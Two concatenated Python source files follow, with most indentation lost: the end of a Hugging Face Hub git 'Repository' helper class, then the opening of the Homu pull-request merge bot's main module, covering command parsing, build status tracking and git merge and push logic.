property will be set to `True` when the push is finished.
auto_lfs_prune (`bool`, *optional*, defaults to `False`):
Whether to automatically prune files once they have been pushed
to the remote.
"""
command = "git push"
if upstream:
command += f" --set-upstream {upstream}"
number_of_commits = commits_to_push(self.local_dir, upstream)
if number_of_commits > 1:
logger.warning(
f"Several commits ({number_of_commits}) will be pushed upstream."
)
if blocking:
logger.warning("The progress bars may be unreliable.")
try:
with _lfs_log_progress():
process = subprocess.Popen(
command.split(),
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding="utf-8",
cwd=self.local_dir,
)
if blocking:
stdout, stderr = process.communicate()
return_code = process.poll()
process.kill()
if len(stderr):
logger.warning(stderr)
if return_code:
raise subprocess.CalledProcessError(
return_code, process.args, output=stdout, stderr=stderr
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if not blocking:
def status_method():
status = process.poll()
if status is None:
return -1
else:
return status
command = CommandInProgress(
"push",
is_done_method=lambda: process.poll() is not None,
status_method=status_method,
process=process,
post_method=self.lfs_prune if auto_lfs_prune else None,
)
self.command_queue.append(command)
return self.git_head_commit_url(), command
if auto_lfs_prune:
self.lfs_prune()
return self.git_head_commit_url()
def git_checkout(self, revision: str, create_branch_ok: Optional[bool] = False):
"""
git checkout a given revision
Setting `create_branch_ok` to `True` will create a branch at the
given revision if that revision doesn't exist.
Args:
revision (`str`):
The revision to checkout.
create_branch_ok (`bool`, *optional*, defaults to `False`):
Whether to create a branch named `revision`, pointing at the
currently checked-out reference, if `revision` isn't an
existing revision.
"""
command = f"git checkout {revision}"
try:
result = run_subprocess(command.split(), self.local_dir)
logger.warning(f"Checked out {revision} from {self.current_branch}.")
logger.warning(result.stdout)
except subprocess.CalledProcessError as exc:
if not create_branch_ok:
raise EnvironmentError(exc.stderr)
else:
command = f"git checkout -b {revision}"
try:
result = run_subprocess(command.split(), self.local_dir)
logger.warning(
f"Revision `{revision}` does not exist. Created and checked out"
f" branch `{revision}`."
)
logger.warning(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def tag_exists(self, tag_name: str, remote: Optional[str] = None) -> bool:
"""
Check if a tag exists or not.
Args:
tag_name (`str`):
The name of the tag to check.
remote (`str`, *optional*):
Whether to check if the tag exists on a remote. This parameter
should be the identifier of the remote.
Returns:
`bool`: Whether the tag exists.
"""
if remote:
try:
result = run_subprocess(
f"git ls-remote origin refs/tags/{tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return len(result) != 0
else:
try:
git_tags = run_subprocess(
"git tag".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
git_tags = git_tags.split("\n")
return tag_name in git_tags
def delete_tag(self, tag_name: str, remote: Optional[str] = None) -> bool:
"""
Delete a tag, both local and remote, if it exists
Args:
tag_name (`str`):
The tag name to delete.
remote (`str`, *optional*):
The remote on which to delete the tag.
Returns:
`bool`: `True` if deleted, `False` if the tag didn't exist.
If remote is not passed, will just be updated locally
"""
delete_locally = True
delete_remotely = True
if not self.tag_exists(tag_name):
delete_locally = False
if not self.tag_exists(tag_name, remote=remote):
delete_remotely = False
if delete_locally:
try:
run_subprocess(
["git", "tag", "-d", tag_name], self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if remote and delete_remotely:
try:
run_subprocess(
f"git push {remote} --delete {tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return True
def add_tag(self, tag_name: str, message: str = None, remote: Optional[str] = None):
"""
Add a tag at the current head and push it
If remote is None, will just be updated locally
If no message is provided, the tag will be lightweight. If a message is
provided, the tag will be annotated.
Args:
tag_name (`str`):
The name of the tag to be added.
message (`str`, *optional*):
The message that accompanies the tag. The tag will turn into an
annotated tag if a message is passed.
remote (`str`, *optional*):
The remote on which to add the tag.
"""
if message:
tag_args = ["git", "tag", "-a", tag_name, "-m", message]
else:
tag_args = ["git", "tag", tag_name]
try:
run_subprocess(tag_args, self.local_dir).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if remote:
try:
run_subprocess(
f"git push {remote} {tag_name}".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def is_repo_clean(self) -> bool:
"""
Return whether or not the git status is clean or not
Returns:
`bool`: `True` if the git status is clean, `False` otherwise.
"""
try:
git_status = run_subprocess(
"git status --porcelain".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return len(git_status) == 0
def push_to_hub(
self,
commit_message: Optional[str] = "commit files to HF hub",
blocking: Optional[bool] = True,
clean_ok: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
) -> Optional[str]:
"""
Helper to add, commit, and push files to remote repository on the
HuggingFace Hub. Will automatically track large files (>10MB).
Args:
commit_message (`str`):
Message to use for the commit.
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the `git push` has
finished.
clean_ok (`bool`, *optional*, defaults to `True`):
If `True`, this function will return `None` if the repo is
untouched (nothing to commit). If `False`, the underlying git
commit command will fail on a clean repo.
auto_lfs_prune (`bool`, *optional*, defaults to `False`):
Whether to automatically prune files once they have been pushed
to the remote.
"""
if clean_ok and self.is_repo_clean():
logger.info("Repo currently clean. Ignoring push_to_hub")
return None
self.git_add(auto_lfs_track=True)
self.git_commit(commit_message)
return self.git_push(
upstream=f"origin {self.current_branch}",
blocking=blocking,
auto_lfs_prune=auto_lfs_prune,
)
@contextmanager
def commit(
self,
commit_message: str,
branch: Optional[str] = None,
track_large_files: Optional[bool] = True,
blocking: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
):
"""
Context manager utility to handle committing to a repository. This
automatically tracks large files (>10MB) with git-lfs. Set the
`track_large_files` argument to `False` if you wish to ignore that
behavior.
Args:
commit_message (`str`):
Message to use for the commit.
branch (`str`, *optional*):
The branch on which the commit will appear. This branch will be
checked-out before any operation.
track_large_files (`bool`, *optional*, defaults to `True`):
Whether to automatically track large files or not. Will do so by
default.
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the `git push` has
finished.
auto_lfs_prune (`bool`, *optional*, defaults to `False`):
Whether to automatically prune files once they have been pushed
to the remote.
Examples:
```python
>>> with Repository(
... "text-files",
... clone_from="<user>/text-files",
... use_auth_token=True,
>>> ).commit("My first file :)"):
... with open("file.txt", "w+") as f:
... f.write(json.dumps({"hey": 8}))
>>> import torch
>>> model = torch.nn.Transformer()
>>> with Repository(
... "torch-model",
... clone_from="<user>/torch-model",
... use_auth_token=True,
>>> ).commit("My cool model :)"):
... torch.save(model.state_dict(), "model.pt")
```
"""
files_to_stage = files_to_be_staged(".", folder=self.local_dir)
if len(files_to_stage):
if len(files_to_stage) > 5:
files_to_stage = str(files_to_stage[:5])[:-1] + ", ...]"
logger.error(
"There exists some updated files in the local repository that are not"
f" committed: {files_to_stage}. This may lead to errors if checking out"
" a branch. These files and their modifications will be added to the"
" current commit."
)
if branch is not None:
self.git_checkout(branch, create_branch_ok=True)
if is_tracked_upstream(self.local_dir):
logger.warning("Pulling changes ...")
self.git_pull(rebase=True)
else:
logger.warning(
"The current branch has no upstream branch. Will push to 'origin"
f" {self.current_branch}'"
)
current_working_directory = os.getcwd()
os.chdir(os.path.join(current_working_directory, self.local_dir))
try:
yield self
finally:
self.git_add(auto_lfs_track=track_large_files)
try:
self.git_commit(commit_message)
except OSError as e:
# If no changes are detected, there is nothing to commit.
if "nothing to commit" not in str(e):
raise e
try:
self.git_push(
upstream=f"origin {self.current_branch}",
blocking=blocking,
auto_lfs_prune=auto_lfs_prune,
)
except OSError as e:
# If no changes are detected, there is nothing to commit.
if "could not read Username" in str(e):
raise OSError(
"Couldn't authenticate user for push. Did you set"
" `use_auth_token` to `True`?"
) from e
else:
raise e
os.chdir(current_working_directory)
def repocard_metadata_load(self) -> Optional[Dict]:
filepath = os.path.join(self.local_dir, REPOCARD_NAME)
if os.path.isfile(filepath):
return metadata_load(filepath)
def repocard_metadata_save(self, data: Dict) -> None:
return metadata_save(os.path.join(self.local_dir, REPOCARD_NAME), data)
@property
def commands_failed(self):
"""
Returns the asynchronous commands that failed.
"""
return [c for c in self.command_queue if c.status > 0]
@property
def commands_in_progress(self):
"""
Returns the asynchronous commands that are currently in progress.
"""
return [c for c in self.command_queue if not c.is_done]
def wait_for_commands(self):
"""
Blocking method: blocks all subsequent execution until all commands have
been processed.
"""
index = 0
for command_failed in self.commands_failed:
logger.error(
f"The {command_failed.title} command with PID"
f" {command_failed._process.pid} failed."
)
logger.error(command_failed.stderr)
while self.commands_in_progress:
if index % 10 == 0:
logger.error(
"Waiting for the following commands to finish before shutting"
f" down: {self.commands_in_progress}."
)
index += 1
time.sleep(1)
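# Hedged usage sketch (not part of huggingface_hub; the repo id passed in is a
# placeholder): clone a repo, add a small file and push it back in one call.
def _example_push(local_dir: str, clone_from: str) -> Optional[str]:
    repo = Repository(local_dir, clone_from=clone_from, use_auth_token=True)
    with open(os.path.join(repo.local_dir, "hello.txt"), "w") as f:
        f.write("hello from the Repository helper\n")
    # push_to_hub() chains git_add(auto_lfs_track=True), git_commit() and git_push().
    return repo.push_to_hub(commit_message="Add hello.txt")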
|
main.py
|
import argparse
import github3
import toml
import json
import re
import functools
from . import comments
from . import utils
from .parse_issue_comment import parse_issue_comment
from .auth import verify as verify_auth
from .utils import lazy_debug
import logging
from threading import Thread, Lock, Timer
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from queue import Queue
import os
import sys
from enum import IntEnum, Enum
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import random
import weakref
STATUS_TO_PRIORITY = {
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
'success': 6,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
DEFAULT_TEST_TIMEOUT = 3600 * 10
VARIABLES_RE = re.compile(r'\${([a-zA-Z_]+)}')
IGNORE_BLOCK_START = '<!-- homu-ignore:start -->'
IGNORE_BLOCK_END = '<!-- homu-ignore:end -->'
IGNORE_BLOCK_RE = re.compile(
r'<!--\s*homu-ignore:start\s*-->'
r'.*'
r'<!--\s*homu-ignore:end\s*-->',
flags=re.MULTILINE | re.DOTALL | re.IGNORECASE
)
global_cfg = {}
# Replace @mention with `@mention` to suppress pings in merge commits.
# Note: Don't replace non-mentions like "email@gmail.com".
def suppress_pings(text):
return re.sub(r'\B(@\S+)', r'`\g<1>`', text) # noqa
# Replace any text between IGNORE_BLOCK_START and IGNORE_BLOCK_END
# HTML comments with an empty string in merge commits
def suppress_ignore_block(text):
return IGNORE_BLOCK_RE.sub('', text)
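# Hedged illustration (not part of the original module): suppress_pings wraps
# @mentions in backticks so merge commit messages do not ping users, while
# plain e-mail addresses are left untouched.
def _suppress_pings_example() -> None:
    assert suppress_pings('thanks @reviewer') == 'thanks `@reviewer`'
    assert suppress_pings('mail someone@example.com') == 'mail someone@example.com'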
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(
repo_cfg['buildbot']['url'] + '/login',
allow_redirects=False,
data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class Repository:
treeclosed = -1
treeclosed_src = None
gh = None
gh_test_on_fork = None
label = None
db = None
def __init__(self, gh, repo_label, db):
self.gh = gh
self.repo_label = repo_label
self.db = db
db_query(
db,
'SELECT treeclosed, treeclosed_src FROM repos WHERE repo = ?',
[repo_label]
)
row = db.fetchone()
if row:
self.treeclosed = row[0]
self.treeclosed_src = row[1]
else:
self.treeclosed = -1
self.treeclosed_src = None
def update_treeclosed(self, value, src):
self.treeclosed = value
self.treeclosed_src = src
db_query(
self.db,
'DELETE FROM repos where repo = ?',
[self.repo_label]
)
if value > 0:
db_query(
self.db,
'''
INSERT INTO repos (repo, treeclosed, treeclosed_src)
VALUES (?, ?, ?)
''',
[self.repo_label, value, src]
)
def __lt__(self, other):
return self.gh < other.gh
class PullReqState:
num = 0
priority = 0
rollup = 0
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que,
gh, owner, name, label_events, repos, test_on_fork):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.timeout_timer = None
self.test_started = time.time()
self.label_events = label_events
self.test_on_fork = test_on_fork
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
fmt = 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'
return fmt.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
-self.priority,
self.rollup,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, comment):
if isinstance(comment, comments.Comment):
comment = "%s\n<!-- homu: %s -->" % (
comment.render(), comment.jsonify(),
)
self.get_issue().create_comment(comment)
def change_labels(self, event):
event = self.label_events.get(event.value, {})
removes = event.get('remove', [])
adds = event.get('add', [])
unless = event.get('unless', [])
if not removes and not adds:
return
issue = self.get_issue()
labels = {label.name for label in issue.iter_labels()}
if labels.isdisjoint(unless):
labels.difference_update(removes)
labels.update(adds)
issue.replace_labels(list(labels))
def set_status(self, status):
self.status = status
if self.timeout_timer:
self.timeout_timer.cancel()
self.timeout_timer = None
db_query(
self.db,
'UPDATE pull SET status = ? WHERE repo = ? AND num = ?',
[self.status, self.repo_label, self.num]
)
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(
self.db,
'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?',
[self.merge_sha, self.repo_label, self.num]
)
def get_status(self):
if self.status == '' and self.approved_by:
if self.mergeable is not False:
return 'approved'
return self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(
self.db,
'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', # noqa
[self.repo_label, self.num, self.mergeable]
)
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(
self.db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(
self.db,
'DELETE FROM build_res WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(
self.db,
'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label].gh
if not repo:
repo = self.gh.repository(self.owner, self.name)
self.repos[self.repo_label].gh = repo
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def get_test_on_fork_repo(self):
if not self.test_on_fork:
return None
repo = self.repos[self.repo_label].gh_test_on_fork
if not repo:
repo = self.gh.repository(
self.test_on_fork['owner'],
self.test_on_fork['name'],
)
self.repos[self.repo_label].gh_test_on_fork = repo
assert repo.owner.login == self.test_on_fork['owner']
assert repo.name == self.test_on_fork['name']
return repo
def save(self):
db_query(
self.db,
'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = suppress_pings(issue.body)
self.body = suppress_ignore_block(self.body)
def fake_merge(self, repo_cfg):
if not repo_cfg.get('linear', False):
return
if repo_cfg.get('autosquash', False):
return
issue = self.get_issue()
title = issue.title
# We tell github to close the PR via the commit message, but it
# doesn't know that constitutes a merge. Edit the title so that it's
# clearer.
merged_prefix = '[merged] '
if not title.startswith(merged_prefix):
title = merged_prefix + title
issue.edit(title=title)
def change_treeclosed(self, value, src):
self.repos[self.repo_label].update_treeclosed(value, src)
def blocked_by_closed_tree(self):
treeclosed = self.repos[self.repo_label].treeclosed
return treeclosed if self.priority < treeclosed else None
def start_testing(self, timeout):
self.test_started = time.time() # FIXME: Save in the local database
self.set_status('pending')
wm = weakref.WeakMethod(self.timed_out)
def timed_out():
m = wm()
if m:
m()
timer = Timer(timeout, timed_out)
timer.start()
self.timeout_timer = timer
def timed_out(self):
print('* Test timed out: {}'.format(self))
self.merge_sha = ''
self.save()
self.set_status('failure')
utils.github_create_status(
self.get_repo(),
self.head_sha,
'failure',
'',
'Test timed out',
context='homu')
self.add_comment(comments.TimedOut())
self.change_labels(LabelEvent.TIMED_OUT)
def record_retry_log(self, src, body):
# destroy ancient records
db_query(
self.db,
"DELETE FROM retry_log WHERE repo = ? AND time < date('now', ?)",
[self.repo_label, global_cfg.get('retry_log_expire', '-42 days')],
)
db_query(
self.db,
'INSERT INTO retry_log (repo, num, src, msg) VALUES (?, ?, ?, ?)',
[self.repo_label, self.num, src, body],
)
@property
def author(self):
"""
Get the GitHub login name of the author of the pull request
"""
return self.get_issue().user.login
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
class AuthState(IntEnum):
# Higher is more privileged
REVIEWER = 3
TRY = 2
NONE = 1
class LabelEvent(Enum):
APPROVED = 'approved'
REJECTED = 'rejected'
CONFLICT = 'conflict'
SUCCEED = 'succeed'
FAILED = 'failed'
TRY = 'try'
TRY_SUCCEED = 'try_succeed'
TRY_FAILED = 'try_failed'
EXEMPTED = 'exempted'
TIMED_OUT = 'timed_out'
INTERRUPTED = 'interrupted'
PUSHED = 'pushed'
PORTAL_TURRET_DIALOG = ["Target acquired", "Activated", "There you are"]
PORTAL_TURRET_IMAGE = "https://cloud.githubusercontent.com/assets/1617736/22222924/c07b2a1c-e16d-11e6-91b3-ac659550585c.png" # noqa
def parse_commands(body, username, user_id, repo_label, repo_cfg, state,
my_username, db, states, *, realtime=False, sha='',
command_src=''):
global global_cfg
state_changed = False
_reviewer_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.REVIEWER,
realtime,
my_username,
)
_try_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.TRY,
realtime,
my_username,
)
hooks = []
if 'hooks' in global_cfg:
hooks = list(global_cfg['hooks'].keys())
commands = parse_issue_comment(username, body, sha, my_username, hooks)
for command in commands:
found = True
if command.action == 'approve':
if not _reviewer_auth_verified():
continue
approver = command.actor
cur_sha = command.commit
# Ignore WIP PRs
is_wip = False
for wip_kw in ['WIP', 'TODO', '[WIP]', '[TODO]', '[DO NOT MERGE]']:
if state.title.upper().startswith(wip_kw):
if realtime:
state.add_comment(comments.ApprovalIgnoredWip(
sha=state.head_sha,
wip_keyword=wip_kw,
))
is_wip = True
break
if is_wip:
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000
# through the webhook. This is called a "null commit", and
# seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits
# in a PR. In this case, we just try to retrieve the head
# SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime:
state.add_comment(
':bangbang: Invalid head SHA found, retrying: `{}`'
.format(state.head_sha)
)
state.head_sha = state.get_repo().pull_request(state.num).head.sha # noqa
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') # noqa
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') # noqa
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) # noqa
if lines:
lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') # noqa
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.try_ = False
state.set_status('')
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(
':scream_cat: {} Please try again with `{}`.'
.format(msg, state.head_sha)
)
else:
state.add_comment(comments.Approved(
sha=state.head_sha,
approver=approver,
bot=my_username,
))
treeclosed = state.blocked_by_closed_tree()
if treeclosed:
state.add_comment(
':evergreen_tree: The tree is currently closed for pull requests below priority {}, this pull request will be tested once the tree is reopened' # noqa
.format(treeclosed)
)
state.change_labels(LabelEvent.APPROVED)
elif command.action == 'unapprove':
# Allow the author of a pull request to unapprove their own PR. The
# author can already perform other actions that effectively
# unapprove the PR (change the target branch, push more commits,
# etc.) so allowing them to directly unapprove it is also allowed.
# Because verify_auth has side-effects (especially, it may leave a
# comment on the pull request if the user is not authorized), we
# need to do the author check BEFORE the verify_auth check.
if state.author != username:
if not verify_auth(username, user_id, repo_label, repo_cfg,
state, AuthState.REVIEWER, realtime,
my_username):
continue
state.approved_by = ''
state.save()
if realtime:
state.change_labels(LabelEvent.REJECTED)
elif command.action == 'prioritize':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.TRY, realtime, my_username):
continue
pvalue = command.priority
if pvalue > global_cfg['max_priority']:
if realtime:
state.add_comment(
':stop_sign: Priority higher than {} is ignored.'
.format(global_cfg['max_priority'])
)
continue
state.priority = pvalue
state.save()
elif command.action == 'delegate':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.REVIEWER, realtime, my_username):
continue
state.delegate = command.delegate_to
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'undelegate':
# TODO: why is this a TRY?
if not _try_auth_verified():
continue
state.delegate = ''
state.save()
elif command.action == 'delegate-author':
if not _reviewer_auth_verified():
continue
state.delegate = state.get_repo().pull_request(state.num).user.login # noqa
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'retry' and realtime:
if not _try_auth_verified():
continue
state.set_status('')
if realtime:
event = LabelEvent.TRY if state.try_ else LabelEvent.APPROVED
state.record_retry_log(command_src, body)
state.change_labels(event)
elif command.action in ['try', 'untry'] and realtime:
if not _try_auth_verified():
continue
if state.status == '' and state.approved_by:
state.add_comment(
':no_good: '
'Please do not `try` after a pull request has been `r+`ed.'
' If you need to `try`, unapprove (`r-`) it first.'
)
continue
state.try_ = command.action == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
if realtime and state.try_:
# If we've tried before, the status will be 'success', and this
# new try will not be picked up. Set the status back to ''
# so the try will be run again.
state.set_status('')
# `try-` just resets the `try` bit and doesn't correspond to
# any meaningful labeling events.
state.change_labels(LabelEvent.TRY)
elif command.action == 'rollup':
if not _try_auth_verified():
continue
state.rollup = command.rollup_value
state.save()
elif command.action == 'force' and realtime:
if not _try_auth_verified():
continue
if 'buildbot' in repo_cfg:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(
repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', # noqa
allow_redirects=False,
data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())), # noqa
}
)
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
                    mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
                    err = mat.group(1).strip() if mat else ''
                    if not err:
                        err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(
':bomb: Buildbot returned an error: `{}`'.format(err)
)
elif command.action == 'clean' and realtime:
if not _try_auth_verified():
continue
state.merge_sha = ''
state.init_build_res([])
state.save()
elif command.action == 'ping' and realtime:
if command.ping_type == 'portal':
state.add_comment(
":cake: {}\n\n".format(
random.choice(PORTAL_TURRET_DIALOG),
PORTAL_TURRET_IMAGE)
)
else:
state.add_comment(":sleepy: I'm awake I'm awake")
elif command.action == 'treeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(command.treeclosed_value, command_src)
state.save()
elif command.action == 'untreeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(-1, None)
state.save()
elif command.action == 'hook':
hook = command.hook_name
hook_cfg = global_cfg['hooks'][hook]
if hook_cfg['realtime'] and not realtime:
continue
if hook_cfg['access'] == "reviewer":
if not _reviewer_auth_verified():
continue
else:
if not _try_auth_verified():
continue
Thread(
target=handle_hook_response,
args=[state, hook_cfg, body, command.hook_extra]
).start()
else:
found = False
if found:
state_changed = True
return state_changed
def handle_hook_response(state, hook_cfg, body, extra_data):
post_data = {}
post_data["pull"] = state.num
post_data["body"] = body
post_data["extra_data"] = extra_data
print(post_data)
response = requests.post(hook_cfg['endpoint'], json=post_data)
print(response.text)
# We only post a response if we're configured to have a response
# non-realtime hooks cannot post
if hook_cfg['has_response'] and hook_cfg['realtime']:
state.add_comment(response.text)
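# git_push() below force-pushes the prepared merge commit to the auto/try
# branch. If that first push is rejected (typically by branch protection that
# requires a passing status), it pushes the commit to `homu-tmp`, attaches a
# synthetic `homu` success status to it, and then retries the push.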
def git_push(git_cmd, branch, state):
merge_sha = subprocess.check_output(git_cmd('rev-parse', 'HEAD')).decode('ascii').strip() # noqa
if utils.silent_call(git_cmd('push', '-f', 'test-origin', branch)):
utils.logged_call(git_cmd('branch', '-f', 'homu-tmp', branch))
utils.logged_call(git_cmd('push', '-f', 'test-origin', 'homu-tmp'))
def inner():
utils.github_create_status(
state.get_repo(),
merge_sha,
'success',
'',
'Branch protection bypassed',
context='homu',
)
def fail(err):
state.add_comment(
':boom: Unable to create a status for {} ({})'
.format(merge_sha, err)
)
utils.retry_until(inner, fail, state)
utils.logged_call(git_cmd('push', '-f', 'test-origin', branch))
return merge_sha
def init_local_git_cmds(repo_cfg, git_cfg):
fpath = os.path.join(git_cfg["cache_dir"], repo_cfg['owner'], repo_cfg['name']) # noqa
genurl = lambda cfg: 'git@github.com:{}/{}.git'.format(cfg['owner'], cfg['name']) # noqa
if not os.path.exists(SSH_KEY_FILE):
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
print("initialized local git repository at", fpath)
utils.logged_call(['git', 'init', fpath])
remotes = {
'origin': genurl(repo_cfg),
'test-origin': genurl(repo_cfg.get('test-on-fork', repo_cfg)),
}
for remote, url in remotes.items():
try:
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', remote, url]) # noqa
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', '--push', remote, url]) # noqa
except subprocess.CalledProcessError:
utils.logged_call(['git', '-C', fpath, 'remote', 'add', remote, url]) # noqa
return lambda *args: ['git', '-C', fpath] + list(args)
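# branch_equal_to_merge() below fetches GitHub's precomputed test-merge ref
# (refs/pull/<num>/merge) and reports whether its tree is identical to the
# branch homu just built, so callers can trust GitHub's merge result before
# pushing.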
def branch_equal_to_merge(git_cmd, state, branch):
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return utils.silent_call(git_cmd('diff', '--quiet', 'FETCH_HEAD', branch)) == 0 # noqa
def create_merge(state, repo_cfg, branch, logger, git_cfg,
ensure_merge_equal=False):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
lazy_debug(logger,
lambda: "create_merge: attempting merge {} into {} on {!r}"
.format(state.head_sha, branch, state.get_repo()))
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body)
desc = 'Merge conflict'
comment = (
'This pull request and the master branch diverged in a way that cannot'
' be automatically merged. Please rebase on top of the latest master'
' branch, and let the reviewer approve again.\n'
'\n'
'<details><summary>How do I rebase?</summary>\n\n'
'Assuming `self` is your fork and `upstream` is this repository,'
' you can resolve the conflict following these steps:\n\n'
'1. `git checkout {branch}` *(switch to your branch)*\n'
'2. `git fetch upstream master` *(retrieve the latest master)*\n'
'3. `git rebase upstream/master -p` *(rebase on top of it)*\n'
'4. Follow the on-screen instruction to resolve conflicts'
